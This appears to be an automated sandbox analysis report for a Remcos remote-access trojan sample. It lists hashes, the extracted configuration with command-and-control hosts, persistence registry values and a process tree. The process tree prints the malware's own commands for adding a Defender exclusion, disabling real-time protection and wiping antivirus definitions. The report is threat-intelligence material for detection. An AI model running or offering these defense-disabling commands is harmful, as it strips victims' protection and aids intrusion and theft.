remcos | 44c0276f4eb577c8914ebf18fce806ab20dec017c6dfc553b13b7c6cca0a087e

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
24-05-2024 21:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

44c0276f4eb577c8914ebf18fce806ab20dec017c6dfc553b13b7c6cca0a087e.exe
Size

6.9MB
MD5

4e5d4e845d8151e1763e1778c6802d21
SHA1

d825fab991db7e4b146341adde684e72909f3236
SHA256

44c0276f4eb577c8914ebf18fce806ab20dec017c6dfc553b13b7c6cca0a087e
SHA512

4d0656f6b18003416f6bfcab1c0a7664f30c4db723465f9f4f1a6f02c90dec2f794a177e422762538a93df49231d925b4a3d56c2defdac2af92a97830267f12a
SSDEEP

98304:6kUb1rBq5Pfr+u2ZwS0SwZFtv445NdaCT1hkNV95OTpLipdbN1BbkJ9J8OXzxHxz:6kWyKajZFt3VfT1YVX6+R4JHj+

Score

10^/10

remcos dlscord execution persistence rat spyware stealer upx

Malware Config

Extracted

Family

remcos

Version

1.7 Pro

Botnet

Dlscord

shall-someone.gl.at.ply.gg:60408

dead-reviewer.gl.at.ply.gg:60161

Attributes

audio_folder
audio
audio_path
%AppData%
audio_record_time
5
connect_delay
10
connect_interval
5
copy_file
Bin.exe
copy_folder
Factorio
delete_file
true
hide_file
true
hide_keylog_file
true
install_flag
true
install_path
%SystemDrive%
keylog_crypt
true
keylog_file
driver.dat
keylog_flag
false
keylog_folder
keyboard drivers
keylog_path
%WinDir%\System32
mouse_option
false
mutex
remcos_bfpmypnbrt
screenshot_crypt
true
screenshot_flag
true
screenshot_folder
Screen drivers
screenshot_path
%WinDir%\System32
screenshot_time
60
startup_value
Windows.Defender
take_screenshot_option
false
take_screenshot_time
5

Signatures

Modifies WinLogon for persistence 2 TTPs 4 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

Bin.exeSlugxquozdp.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\WINDOWS\\system32\\userinit.exe, \"C:\\Factorio\\Bin.exe\""	Bin.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Factorio\\Bin.exe\""	Slugxquozdp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\WINDOWS\\system32\\userinit.exe, \"C:\\Factorio\\Bin.exe\""	Slugxquozdp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Factorio\\Bin.exe\""	Bin.exe

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

detects Windows exceutables potentially bypassing UAC using eventvwr.exe 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Slugxquozdp.exe	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer
behavioral2/memory/3036-95-0x0000000000400000-0x0000000000417000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer

Adds policy Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Slugxquozdp.exeBin.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	Slugxquozdp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Windows.Defender = "\"C:\\Factorio\\Bin.exe\""	Slugxquozdp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	Bin.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Windows.Defender = "\"C:\\Factorio\\Bin.exe\""	Bin.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

872 powershell.exe
1804 powershell.exe
1944 powershell.exe

pid	process
872	powershell.exe
1804	powershell.exe
1944	powershell.exe

Drops file in Drivers directory 3 IoCs

Processes:

attrib.exeAtyanjlltndx.exeattrib.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Atyanjlltndx.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

44c0276f4eb577c8914ebf18fce806ab20dec017c6dfc553b13b7c6cca0a087e.exeSlugxquozdp.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	44c0276f4eb577c8914ebf18fce806ab20dec017c6dfc553b13b7c6cca0a087e.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	Slugxquozdp.exe

Executes dropped EXE 6 IoCs

Processes:

Slugxquozdp.exeKbwdawuun.exeAtyanjlltndx.exeAtyanjlltndx.exeBin.exerar.exe

pid process

1992 Slugxquozdp.exe
1020 Kbwdawuun.exe
3652 Atyanjlltndx.exe
1816 Atyanjlltndx.exe
2696 Bin.exe
1268 rar.exe

pid	process
1992	Slugxquozdp.exe
1020	Kbwdawuun.exe
3652	Atyanjlltndx.exe
1816	Atyanjlltndx.exe
2696	Bin.exe
1268	rar.exe

Loads dropped DLL 17 IoCs

Processes:

Atyanjlltndx.exe

pid	process
1816	Atyanjlltndx.exe
1816	Atyanjlltndx.exe
1816	Atyanjlltndx.exe
1816	Atyanjlltndx.exe
1816	Atyanjlltndx.exe
1816	Atyanjlltndx.exe
1816	Atyanjlltndx.exe
1816	Atyanjlltndx.exe
1816	Atyanjlltndx.exe
1816	Atyanjlltndx.exe
1816	Atyanjlltndx.exe
1816	Atyanjlltndx.exe
1816	Atyanjlltndx.exe
1816	Atyanjlltndx.exe
1816	Atyanjlltndx.exe
1816	Atyanjlltndx.exe
1816	Atyanjlltndx.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 58 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\_MEI36522\python311.dll	upx
behavioral2/memory/1816-65-0x00007FFF0B750000-0x00007FFF0BD39000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI36522\_ctypes.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI36522\libssl-1_1.dll	upx
behavioral2/memory/1816-89-0x00007FFF25FF0000-0x00007FFF25FFF000-memory.dmp	upx
behavioral2/memory/1816-88-0x00007FFF23C50000-0x00007FFF23C73000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI36522\_ssl.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI36522\_sqlite3.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI36522\_socket.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI36522\_queue.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI36522\_lzma.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI36522\_hashlib.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI36522\_decimal.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI36522\_bz2.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI36522\unicodedata.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI36522\sqlite3.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI36522\select.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI36522\libcrypto-1_1.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI36522\libffi-8.dll	upx
behavioral2/memory/1816-101-0x00007FFF201E0000-0x00007FFF2020D000-memory.dmp	upx
behavioral2/memory/1816-105-0x00007FFF20000000-0x00007FFF20023000-memory.dmp	upx
behavioral2/memory/1816-104-0x00007FFF20D70000-0x00007FFF20D89000-memory.dmp	upx
behavioral2/memory/1816-107-0x00007FFF10C80000-0x00007FFF10DF7000-memory.dmp	upx
behavioral2/memory/1816-109-0x00007FFF201C0000-0x00007FFF201D9000-memory.dmp	upx
behavioral2/memory/1816-111-0x00007FFF20380000-0x00007FFF2038D000-memory.dmp	upx
behavioral2/memory/1816-113-0x00007FFF1FFD0000-0x00007FFF1FFFE000-memory.dmp	upx
behavioral2/memory/1816-115-0x00007FFF1F860000-0x00007FFF1F918000-memory.dmp	upx
behavioral2/memory/1816-118-0x00007FFF10900000-0x00007FFF10C78000-memory.dmp	upx
behavioral2/memory/1816-127-0x00007FFF103C0000-0x00007FFF104DC000-memory.dmp	upx
behavioral2/memory/1816-126-0x00007FFF23C50000-0x00007FFF23C73000-memory.dmp	upx
behavioral2/memory/1816-125-0x00007FFF1FFC0000-0x00007FFF1FFCD000-memory.dmp	upx
behavioral2/memory/1816-124-0x00007FFF20160000-0x00007FFF20174000-memory.dmp	upx
behavioral2/memory/1816-122-0x00007FFF0B750000-0x00007FFF0BD39000-memory.dmp	upx
behavioral2/memory/1816-210-0x00007FFF201E0000-0x00007FFF2020D000-memory.dmp	upx
behavioral2/memory/1816-294-0x00007FFF20000000-0x00007FFF20023000-memory.dmp	upx
behavioral2/memory/1816-319-0x00007FFF0B750000-0x00007FFF0BD39000-memory.dmp	upx
behavioral2/memory/1816-334-0x00007FFF10C80000-0x00007FFF10DF7000-memory.dmp	upx
behavioral2/memory/1816-333-0x00007FFF103C0000-0x00007FFF104DC000-memory.dmp	upx
behavioral2/memory/1816-330-0x00007FFF10900000-0x00007FFF10C78000-memory.dmp	upx
behavioral2/memory/1816-329-0x00007FFF1F860000-0x00007FFF1F918000-memory.dmp	upx
behavioral2/memory/1816-328-0x00007FFF1FFD0000-0x00007FFF1FFFE000-memory.dmp	upx
behavioral2/memory/1816-326-0x00007FFF201C0000-0x00007FFF201D9000-memory.dmp	upx
behavioral2/memory/1816-320-0x00007FFF23C50000-0x00007FFF23C73000-memory.dmp	upx
behavioral2/memory/1816-345-0x00007FFF1F860000-0x00007FFF1F918000-memory.dmp	upx
behavioral2/memory/1816-344-0x00007FFF1FFD0000-0x00007FFF1FFFE000-memory.dmp	upx
behavioral2/memory/1816-353-0x00007FFF10900000-0x00007FFF10C78000-memory.dmp	upx
behavioral2/memory/1816-352-0x00007FFF1FFC0000-0x00007FFF1FFCD000-memory.dmp	upx
behavioral2/memory/1816-351-0x00007FFF20160000-0x00007FFF20174000-memory.dmp	upx
behavioral2/memory/1816-350-0x00007FFF103C0000-0x00007FFF104DC000-memory.dmp	upx
behavioral2/memory/1816-343-0x00007FFF20380000-0x00007FFF2038D000-memory.dmp	upx
behavioral2/memory/1816-342-0x00007FFF201C0000-0x00007FFF201D9000-memory.dmp	upx
behavioral2/memory/1816-341-0x00007FFF10C80000-0x00007FFF10DF7000-memory.dmp	upx
behavioral2/memory/1816-340-0x00007FFF20000000-0x00007FFF20023000-memory.dmp	upx
behavioral2/memory/1816-339-0x00007FFF20D70000-0x00007FFF20D89000-memory.dmp	upx
behavioral2/memory/1816-338-0x00007FFF201E0000-0x00007FFF2020D000-memory.dmp	upx
behavioral2/memory/1816-337-0x00007FFF25FF0000-0x00007FFF25FFF000-memory.dmp	upx
behavioral2/memory/1816-336-0x00007FFF23C50000-0x00007FFF23C73000-memory.dmp	upx
behavioral2/memory/1816-335-0x00007FFF0B750000-0x00007FFF0BD39000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Slugxquozdp.exeBin.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows.Defender = "\"C:\\Factorio\\Bin.exe\""	Slugxquozdp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows.Defender = "\"C:\\Factorio\\Bin.exe\""	Slugxquozdp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows.Defender = "\"C:\\Factorio\\Bin.exe\""	Bin.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows.Defender = "\"C:\\Factorio\\Bin.exe\""	Bin.exe

Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

14 ip-api.com
20 ip-api.com

flow	ioc
14	ip-api.com
20	ip-api.com

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

Slugxquozdp.exeBin.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\	Slugxquozdp.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\	Bin.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

Bin.exe

description pid process target process

PID 2696 set thread context of 3036 2696 Bin.exe iexplore.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exeWMIC.exeWMIC.exe

pid process

2812 WMIC.exe
4556 WMIC.exe
1404 WMIC.exe
Enumerates processes with tasklist 1 TTPs 5 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid process

4428 tasklist.exe
4880 tasklist.exe
2176 tasklist.exe
3996 tasklist.exe
3496 tasklist.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

1732 systeminfo.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

3268 PING.EXE

description	pid	process	target process
PID 2696 set thread context of 3036	2696	Bin.exe	iexplore.exe

pid	process
2812	WMIC.exe
4556	WMIC.exe
1404	WMIC.exe

pid	process
4428	tasklist.exe
4880	tasklist.exe
2176	tasklist.exe
3996	tasklist.exe
3496	tasklist.exe

pid	process
1732	systeminfo.exe

pid	process
3268	PING.EXE

Suspicious behavior: EnumeratesProcesses 29 IoCs

Processes:

Bin.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2696	Bin.exe
2696	Bin.exe
1944	powershell.exe
1944	powershell.exe
3316	powershell.exe
3316	powershell.exe
1944	powershell.exe
3316	powershell.exe
1804	powershell.exe
1804	powershell.exe
1804	powershell.exe
964	powershell.exe
964	powershell.exe
964	powershell.exe
872	powershell.exe
872	powershell.exe
872	powershell.exe
1228	powershell.exe
1228	powershell.exe
1228	powershell.exe
964	powershell.exe
964	powershell.exe
964	powershell.exe
4604	powershell.exe
4604	powershell.exe
4604	powershell.exe
1008	powershell.exe
1008	powershell.exe
1008	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

WMIC.exetasklist.exepowershell.exepowershell.exeWMIC.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	1360	WMIC.exe
Token: SeSecurityPrivilege	1360	WMIC.exe
Token: SeTakeOwnershipPrivilege	1360	WMIC.exe
Token: SeLoadDriverPrivilege	1360	WMIC.exe
Token: SeSystemProfilePrivilege	1360	WMIC.exe
Token: SeSystemtimePrivilege	1360	WMIC.exe
Token: SeProfSingleProcessPrivilege	1360	WMIC.exe
Token: SeIncBasePriorityPrivilege	1360	WMIC.exe
Token: SeCreatePagefilePrivilege	1360	WMIC.exe
Token: SeBackupPrivilege	1360	WMIC.exe
Token: SeRestorePrivilege	1360	WMIC.exe
Token: SeShutdownPrivilege	1360	WMIC.exe
Token: SeDebugPrivilege	1360	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1360	WMIC.exe
Token: SeRemoteShutdownPrivilege	1360	WMIC.exe
Token: SeUndockPrivilege	1360	WMIC.exe
Token: SeManageVolumePrivilege	1360	WMIC.exe
Token: 33	1360	WMIC.exe
Token: 34	1360	WMIC.exe
Token: 35	1360	WMIC.exe
Token: 36	1360	WMIC.exe
Token: SeDebugPrivilege	2176	tasklist.exe
Token: SeDebugPrivilege	1944	powershell.exe
Token: SeDebugPrivilege	3316	powershell.exe
Token: SeIncreaseQuotaPrivilege	1360	WMIC.exe
Token: SeSecurityPrivilege	1360	WMIC.exe
Token: SeTakeOwnershipPrivilege	1360	WMIC.exe
Token: SeLoadDriverPrivilege	1360	WMIC.exe
Token: SeSystemProfilePrivilege	1360	WMIC.exe
Token: SeSystemtimePrivilege	1360	WMIC.exe
Token: SeProfSingleProcessPrivilege	1360	WMIC.exe
Token: SeIncBasePriorityPrivilege	1360	WMIC.exe
Token: SeCreatePagefilePrivilege	1360	WMIC.exe
Token: SeBackupPrivilege	1360	WMIC.exe
Token: SeRestorePrivilege	1360	WMIC.exe
Token: SeShutdownPrivilege	1360	WMIC.exe
Token: SeDebugPrivilege	1360	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1360	WMIC.exe
Token: SeRemoteShutdownPrivilege	1360	WMIC.exe
Token: SeUndockPrivilege	1360	WMIC.exe
Token: SeManageVolumePrivilege	1360	WMIC.exe
Token: 33	1360	WMIC.exe
Token: 34	1360	WMIC.exe
Token: 35	1360	WMIC.exe
Token: 36	1360	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2812	WMIC.exe
Token: SeSecurityPrivilege	2812	WMIC.exe
Token: SeTakeOwnershipPrivilege	2812	WMIC.exe
Token: SeLoadDriverPrivilege	2812	WMIC.exe
Token: SeSystemProfilePrivilege	2812	WMIC.exe
Token: SeSystemtimePrivilege	2812	WMIC.exe
Token: SeProfSingleProcessPrivilege	2812	WMIC.exe
Token: SeIncBasePriorityPrivilege	2812	WMIC.exe
Token: SeCreatePagefilePrivilege	2812	WMIC.exe
Token: SeBackupPrivilege	2812	WMIC.exe
Token: SeRestorePrivilege	2812	WMIC.exe
Token: SeShutdownPrivilege	2812	WMIC.exe
Token: SeDebugPrivilege	2812	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2812	WMIC.exe
Token: SeRemoteShutdownPrivilege	2812	WMIC.exe
Token: SeUndockPrivilege	2812	WMIC.exe
Token: SeManageVolumePrivilege	2812	WMIC.exe
Token: 33	2812	WMIC.exe
Token: 34	2812	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

44c0276f4eb577c8914ebf18fce806ab20dec017c6dfc553b13b7c6cca0a087e.exeAtyanjlltndx.exeKbwdawuun.exeSlugxquozdp.execmd.exeBin.exeAtyanjlltndx.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2812 wrote to memory of 1992	2812	44c0276f4eb577c8914ebf18fce806ab20dec017c6dfc553b13b7c6cca0a087e.exe	Slugxquozdp.exe
PID 2812 wrote to memory of 1992	2812	44c0276f4eb577c8914ebf18fce806ab20dec017c6dfc553b13b7c6cca0a087e.exe	Slugxquozdp.exe
PID 2812 wrote to memory of 1992	2812	44c0276f4eb577c8914ebf18fce806ab20dec017c6dfc553b13b7c6cca0a087e.exe	Slugxquozdp.exe
PID 2812 wrote to memory of 1020	2812	44c0276f4eb577c8914ebf18fce806ab20dec017c6dfc553b13b7c6cca0a087e.exe	Kbwdawuun.exe
PID 2812 wrote to memory of 1020	2812	44c0276f4eb577c8914ebf18fce806ab20dec017c6dfc553b13b7c6cca0a087e.exe	Kbwdawuun.exe
PID 2812 wrote to memory of 3652	2812	44c0276f4eb577c8914ebf18fce806ab20dec017c6dfc553b13b7c6cca0a087e.exe	Atyanjlltndx.exe
PID 2812 wrote to memory of 3652	2812	44c0276f4eb577c8914ebf18fce806ab20dec017c6dfc553b13b7c6cca0a087e.exe	Atyanjlltndx.exe
PID 3652 wrote to memory of 1816	3652	Atyanjlltndx.exe	Atyanjlltndx.exe
PID 3652 wrote to memory of 1816	3652	Atyanjlltndx.exe	Atyanjlltndx.exe
PID 1020 wrote to memory of 408	1020	Kbwdawuun.exe	cmd.exe
PID 1020 wrote to memory of 408	1020	Kbwdawuun.exe	cmd.exe
PID 1992 wrote to memory of 2236	1992	Slugxquozdp.exe	cmd.exe
PID 1992 wrote to memory of 2236	1992	Slugxquozdp.exe	cmd.exe
PID 1992 wrote to memory of 2236	1992	Slugxquozdp.exe	cmd.exe
PID 2236 wrote to memory of 3268	2236	cmd.exe	PING.EXE
PID 2236 wrote to memory of 3268	2236	cmd.exe	PING.EXE
PID 2236 wrote to memory of 3268	2236	cmd.exe	PING.EXE
PID 2236 wrote to memory of 2696	2236	cmd.exe	Bin.exe
PID 2236 wrote to memory of 2696	2236	cmd.exe	Bin.exe
PID 2236 wrote to memory of 2696	2236	cmd.exe	Bin.exe
PID 2696 wrote to memory of 3036	2696	Bin.exe	iexplore.exe
PID 2696 wrote to memory of 3036	2696	Bin.exe	iexplore.exe
PID 2696 wrote to memory of 3036	2696	Bin.exe	iexplore.exe
PID 2696 wrote to memory of 3036	2696	Bin.exe	iexplore.exe
PID 2696 wrote to memory of 3036	2696	Bin.exe	iexplore.exe
PID 2696 wrote to memory of 3036	2696	Bin.exe	iexplore.exe
PID 2696 wrote to memory of 3036	2696	Bin.exe	iexplore.exe
PID 2696 wrote to memory of 3036	2696	Bin.exe	iexplore.exe
PID 2696 wrote to memory of 3036	2696	Bin.exe	iexplore.exe
PID 1816 wrote to memory of 3692	1816	Atyanjlltndx.exe	cmd.exe
PID 1816 wrote to memory of 3692	1816	Atyanjlltndx.exe	cmd.exe
PID 1816 wrote to memory of 1268	1816	Atyanjlltndx.exe	cmd.exe
PID 1816 wrote to memory of 1268	1816	Atyanjlltndx.exe	cmd.exe
PID 1816 wrote to memory of 432	1816	Atyanjlltndx.exe	cmd.exe
PID 1816 wrote to memory of 432	1816	Atyanjlltndx.exe	cmd.exe
PID 1816 wrote to memory of 4304	1816	Atyanjlltndx.exe	cmd.exe
PID 1816 wrote to memory of 4304	1816	Atyanjlltndx.exe	cmd.exe
PID 1816 wrote to memory of 3420	1816	Atyanjlltndx.exe	cmd.exe
PID 1816 wrote to memory of 3420	1816	Atyanjlltndx.exe	cmd.exe
PID 3692 wrote to memory of 1944	3692	cmd.exe	powershell.exe
PID 3692 wrote to memory of 1944	3692	cmd.exe	powershell.exe
PID 3420 wrote to memory of 1360	3420	cmd.exe	WMIC.exe
PID 3420 wrote to memory of 1360	3420	cmd.exe	WMIC.exe
PID 4304 wrote to memory of 2176	4304	cmd.exe	tasklist.exe
PID 4304 wrote to memory of 2176	4304	cmd.exe	tasklist.exe
PID 432 wrote to memory of 4092	432	cmd.exe	mshta.exe
PID 432 wrote to memory of 4092	432	cmd.exe	mshta.exe
PID 1268 wrote to memory of 3316	1268	cmd.exe	Conhost.exe
PID 1268 wrote to memory of 3316	1268	cmd.exe	Conhost.exe
PID 1816 wrote to memory of 4856	1816	Atyanjlltndx.exe	Conhost.exe
PID 1816 wrote to memory of 4856	1816	Atyanjlltndx.exe	Conhost.exe
PID 4856 wrote to memory of 2676	4856	cmd.exe	reg.exe
PID 4856 wrote to memory of 2676	4856	cmd.exe	reg.exe
PID 1816 wrote to memory of 1996	1816	Atyanjlltndx.exe	cmd.exe
PID 1816 wrote to memory of 1996	1816	Atyanjlltndx.exe	cmd.exe
PID 1996 wrote to memory of 2744	1996	cmd.exe	reg.exe
PID 1996 wrote to memory of 2744	1996	cmd.exe	reg.exe
PID 1816 wrote to memory of 4380	1816	Atyanjlltndx.exe	cmd.exe
PID 1816 wrote to memory of 4380	1816	Atyanjlltndx.exe	cmd.exe
PID 4380 wrote to memory of 2812	4380	cmd.exe	WMIC.exe
PID 4380 wrote to memory of 2812	4380	cmd.exe	WMIC.exe
PID 1816 wrote to memory of 836	1816	Atyanjlltndx.exe	cmd.exe
PID 1816 wrote to memory of 836	1816	Atyanjlltndx.exe	cmd.exe
PID 836 wrote to memory of 4556	836	cmd.exe	reg.exe

Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exe

pid process

744 attrib.exe
2176 attrib.exe

pid	process
744	attrib.exe
2176	attrib.exe

C:\Users\Admin\AppData\Local\Temp\44c0276f4eb577c8914ebf18fce806ab20dec017c6dfc553b13b7c6cca0a087e.exe
"C:\Users\Admin\AppData\Local\Temp\44c0276f4eb577c8914ebf18fce806ab20dec017c6dfc553b13b7c6cca0a087e.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2812

C:\Users\Admin\AppData\Local\Temp\Slugxquozdp.exe
"C:\Users\Admin\AppData\Local\Temp\Slugxquozdp.exe"
2⤵
- Modifies WinLogon for persistence
- Adds policy Run key to start application
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Modifies WinLogon
- Suspicious use of WriteProcessMemory
PID:1992

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\install.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:2236

C:\Windows\SysWOW64\PING.EXE
PING 127.0.0.1 -n 2
4⤵
- Runs ping.exe
PID:3268

C:\Factorio\Bin.exe
"C:\Factorio\Bin.exe"
4⤵
- Modifies WinLogon for persistence
- Adds policy Run key to start application
- Executes dropped EXE
- Adds Run key to start application
- Modifies WinLogon
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2696

C:\Program Files (x86)\Internet Explorer\iexplore.exe
"C:\Program Files (x86)\Internet Explorer\iexplore.exe"
5⤵
PID:3036

C:\Users\Admin\AppData\Local\Temp\Kbwdawuun.exe
"C:\Users\Admin\AppData\Local\Temp\Kbwdawuun.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1020

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\41BC.tmp\41BD.tmp\41BE.bat C:\Users\Admin\AppData\Local\Temp\Kbwdawuun.exe"
3⤵
PID:408

C:\Users\Admin\AppData\Local\Temp\Atyanjlltndx.exe
"C:\Users\Admin\AppData\Local\Temp\Atyanjlltndx.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3652

C:\Users\Admin\AppData\Local\Temp\Atyanjlltndx.exe
"C:\Users\Admin\AppData\Local\Temp\Atyanjlltndx.exe"
3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1816

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Atyanjlltndx.exe'"
4⤵
- Suspicious use of WriteProcessMemory
PID:3692

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Atyanjlltndx.exe'
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1944

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
4⤵
- Suspicious use of WriteProcessMemory
PID:1268

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3316

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('stop code x[3458739485126347346B]', 0, 'failed to load', 0+16);close()""
4⤵
- Suspicious use of WriteProcessMemory
PID:432

C:\Windows\system32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('stop code x[3458739485126347346B]', 0, 'failed to load', 0+16);close()"
5⤵
PID:4092

